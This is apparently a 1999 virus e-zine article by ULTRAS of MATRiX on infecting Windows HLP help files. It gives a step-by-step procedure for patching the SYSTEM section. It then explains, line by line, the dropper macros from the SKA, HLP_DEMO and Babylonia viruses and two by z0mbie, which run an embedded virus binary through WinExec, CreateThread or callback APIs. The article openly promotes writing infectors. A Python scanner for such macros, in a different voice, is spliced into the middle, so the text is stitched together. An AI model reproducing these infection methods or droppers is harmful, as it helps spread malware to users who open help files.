HLP

In this article I will talk about infecting HLP files. HLP file infection was used in the SKA, HLP_DEMO and Babylonia viruses, and I have decided to describe this infection method in detail.

HLP files can contain subroutines written in a special script language (macros). The script language used in HLP files makes it possible to create files on disk and to run them. These scripts are executed automatically by the HLP file handler (the WinHelp utility) when the file is opened. An HLP file is divided into several sections; only the SYSTEM section will interest us, since that is where the virus can be written. Scripts in HLP files are encoded and packed with a fairly simple LZ77 algorithm.
Layout of the page (section) directory: the first byte of the header is 2Fh. We do not need this header much, but at offset 37h relative to it we find the directory. So the section of interest to us is SYSTEM, which holds most of the information about the structure of the HLP file, the language used in the operating system, the icon and
all the other shit used in HLP files.

[ Infection ]

There are two possible ways to infect HLP files: the first was used in the SKA virus and the second in HLP_DEMO. The first method is better suited
to DOS viruses and the second to Win32 platforms. Below I will give examples and describe them. So, step by step, here is what must be done to infect HLP files.

1. Read the beginning of the HLP directory
2. Find the "|SYSTEM" string
3. Read the SYSTEM macros
4. Check whether the HLP file is already infected
5. Generate our macros
6. Correct the SYSTEM length
7. Write the script-macro header + our script macro at the end of the module
8. Rewrite the SYSTEM section
9. Write & correct the hlp_header
10. Create the virus dropper from the SYSTEM macros & write it at EOF
11. Write the hlp_dir with the corrected "SYSTEM" macros


[ Virus Script - Macro Dropper ]

So, the most important part of an HLP virus is the virus script (dropper). Having read
the description of the HLP format, I will say a little about HLP macros
and describe which droppers were used in the SKA, HLP_DEMO and Babylonia
viruses.

So, an example virus script, SKA:

IF(NOT(FE(`C:\\NTLDR.')),`RR("KERNEL32","Sleep","U")')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`C:\\\\CFBEY.COM',qchPath,0)')

And now I will describe, in order, how this script from the SKA virus works:

The Win95.SK virus calls command.com and, with the help of the echo command, creates a file with a copy of the virus, which is then started. The file name and its polymorphic contents are chosen randomly at each HLP infection. The drawback of this method is that the command.com window that gets launched becomes visible to the user.

IF(NOT(FE(`C:\\NTLDR.'))
Here the script checks whether the file C:\NTLDR (the Windows NT loader) exists on the system; this is needed so that the virus is not started under WinNT.

`RR("KERNEL32","Sleep","U")'
Imports the Sleep function from kernel32.dll with an unsigned long int parameter.

IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
This function starts command.com and copies the virus into ?????.COM,
where ?????.COM is the generated name
and ?????????? is the virus binary.

IF(NOT(FE(`C:\\NTLDR.')),`EF(`C:\\\\?????.COM',qchPath,0)')
This function starts ?????.COM; qchPath is the full path to the open HLP file.

So, an example virus script, HLP_DEMO:

RR(`uSeR32.dll',`MessageBoxA',`USSU')
MessageBoxA(0,`Trying to infect',`HLP.Demo',0)
RR(`kERnEL32.dLL',`EnumDateFormatsA',`SUU')
EnumDateFormatsA(` ',2048,2)
MessageBoxA(0,`Script comes to end!',`HLP.Demo',0)

And now I will describe how this script from the HLP_DEMO virus works:
This script is better suited to viruses for the windoze platform, and it seems this method has no drawbacks.

RR(`uSeR32.dll',`MessageBoxA',`USSU')
Imports the MessageBoxA function from kernel32.dll with its parameters.

MessageBoxA(0,`Trying to infect',`HLP.Demo',0)
We display the message.

RR(`kERnEL32.dLL',`EnumDateFormatsA',`SUU')
Imports the EnumDateFormatsA function from kernel32.dll with its parameters.

EnumDateFormatsA(` ',2048,2)
We call this function and control passes to our virus.

MessageBoxA(0,`Script comes to end!',`HLP.Demo',0)
We display the message.

So, an example virus script, Babylonia:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

RR ("USER32.DLL", "EnumWindows", "SU")
"EnumWindows ("?????', 666)

It seems to be a very good and convenient script for an HLP virus.
RR ("USER32.DLL", "EnumWindows", "SU")
Imports the EnumWindows function from user32.dll with its parameters.

"EnumWindows ("?????', 666)
We call this function with an interesting parameter (????? is the virus binary).

Another virus script by Z0MBiE
~~~~~~~~~~~~~~~~~~~~

RR(`KERNEL32.DLL',`CreateThread',`UUSUUS')
CreateThread (0,0, "????? ', 0,0, "nnnn")

This is also a very interesting method, written by z0mbie; according to the author this method has some drawbacks, but it can be used and it works.


RR(`KERNEL32.DLL',`CreateThread',`UUSUUS')
Imports the CreateThread function from kernel32.dll with its parameters.

CreateThread (0,0, "????? ', 0,0, "nnnn")
We call this function (????? is the virus binary).

Another virus script by Z0MBiE
~~~~~~~~~~~~~~~~~~~~

RR (" KERNEL32. DLL ', "WinExec", "SU")
WinExec(`command.com /c echo????? > sux.com ', 0)
WinExec ("sux.com", 0)
WinExec(`command.com /c del sux.com ', 0)

One more interesting method, also written by z0mbie; it seems to me better suited to multiplatform viruses, but it will also work on the windoze platform without any special problems.

RR (" KERNEL32. DLL ', "WinExec", "SU")
Imports the WinExec function from kernel32.dll with its parameters.

WinExec(`command.com /c echo ????? > sux.com ', 0)
Starts command.com with the help of WinExec and copies the virus into sux.com
(????? is the virus binary).

WinExec ("sux.com", 0)
Starts sux.com with the help of WinExec.

WinExec(`command.com /c del sux.com ', 0)
Deletes the file sux.com.
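The droppers quoted above share a small set of tells: an RR registration followed by a call into the registered API (EnumDateFormatsA, EnumWindows, CreateThread, WinExec), EF or WinExec launching command.com or a dropped .com file, and the FE check for NTLDR. Those tells are what a scanner for infected help files looks for. What follows is an added example, not code from this article or from any of the viruses it describes: a Python triage routine over macro text. It assumes the macro text has already been extracted and unpacked from the |SYSTEM section (the article says the scripts are LZ77-packed on disk, and that unpacking is not done here); the sample fed to it is constructed in the style of the z0mbie WinExec script.

```python
import re

# Added example, not code from the article or from the viruses it describes.
# Assumption: the macro text has already been extracted and unpacked from the
# |SYSTEM section; LZ77 unpacking of the on-disk form is out of scope here.

# APIs the droppers in the article register with RR (RegisterRoutine) and then
# call to hand control to bytes embedded in the macro, or to spawn a program.
CALLBACK_APIS = {"enumdateformatsa", "enumwindows", "createthread", "winexec"}

# RR(<dll>, <function>, <param types>) in any of the quoting styles seen in the
# article: backtick/apostrophe, double quotes, and stray spaces inside the name.
RR_RE = re.compile(
    r"\bRR\s*\(\s*[`'\"]?\s*([A-Za-z0-9_. ]+?)\s*[`'\"]?\s*,\s*[`'\"]?\s*([A-Za-z0-9_]+)",
    re.IGNORECASE,
)

# EF (ExecFile) and WinExec start another program; capture the first argument.
LAUNCH_RE = re.compile(r"\b(EF|WinExec)\s*\(\s*([^,]*)", re.IGNORECASE)

# FE (FileExist) on NTLDR: the SKA script's "do not run under NT" gate.
NT_GATE_RE = re.compile(r"\bFE\s*\([^)]*NTLDR", re.IGNORECASE)


def normalize_dll(raw):
    """Collapse whitespace and case so ' KERNEL32. DLL' becomes 'kernel32.dll'."""
    return re.sub(r"\s+", "", raw).lower()


def analyze_macros(text):
    """Triage one blob of WinHelp macro text.

    Returns a dict with the routines registered through RR, a list of
    human-readable findings, and a boolean verdict.
    """
    registered = {}
    findings = []

    for m in RR_RE.finditer(text):
        dll, func = normalize_dll(m.group(1)), m.group(2)
        registered[func.lower()] = dll
        if func.lower() in CALLBACK_APIS:
            findings.append(f"RR registers {func} from {dll} (callback/thread/exec API)")

    for m in LAUNCH_RE.finditer(text):
        macro = m.group(1).upper()
        target = m.group(2).strip(" `'\"")
        if "command.com" in target.lower():
            findings.append(f"{macro} runs {target} (shell used to write or delete a dropped file)")
        elif target.lower().endswith((".com", ".exe")):
            findings.append(f"{macro} runs {target} (executable launched from a help file)")

    if NT_GATE_RE.search(text):
        findings.append("FE check for NTLDR (platform gate before the payload runs)")

    # The article writes '?????' for the embedded binary; in a real sample those
    # bytes are not printable text, which is itself a useful signal.
    if any((ord(c) < 32 and c not in "\r\n\t") or ord(c) > 126 for c in text):
        findings.append("non-printable bytes embedded in macro text")

    return {"registered": registered, "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    # Constructed sample in the style of the z0mbie WinExec script quoted above.
    sample = ("RR (\" KERNEL32. DLL ', \"WinExec\", \"SU\")\n"
              "WinExec(`command.com /c echo????? > sux.com ', 0)\n"
              "WinExec (\"sux.com\", 0)\n")
    for line in analyze_macros(sample)["findings"]:
        print(line)
```

The regexes are deliberately loose about quoting and whitespace because, as the quoted scripts show, WinHelp accepts several quote styles and the authors mix case freely (`uSeR32.dll`, `kERnEL32.dLL`); a scanner that keyed on exact strings would miss them. A clean help file registers nothing with RR and launches nothing, so an empty findings list is the expected result for it.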

So, HLP file infection can be considered very simple to write; all that is needed is a good polymorphic engine suited to HLP infection. I have not described all the commands that can be used in HLP files, but in the next release of the e-zine I plan to describe them and to write an HLP infector.

ULTRAS[MATRiX]

12/2/99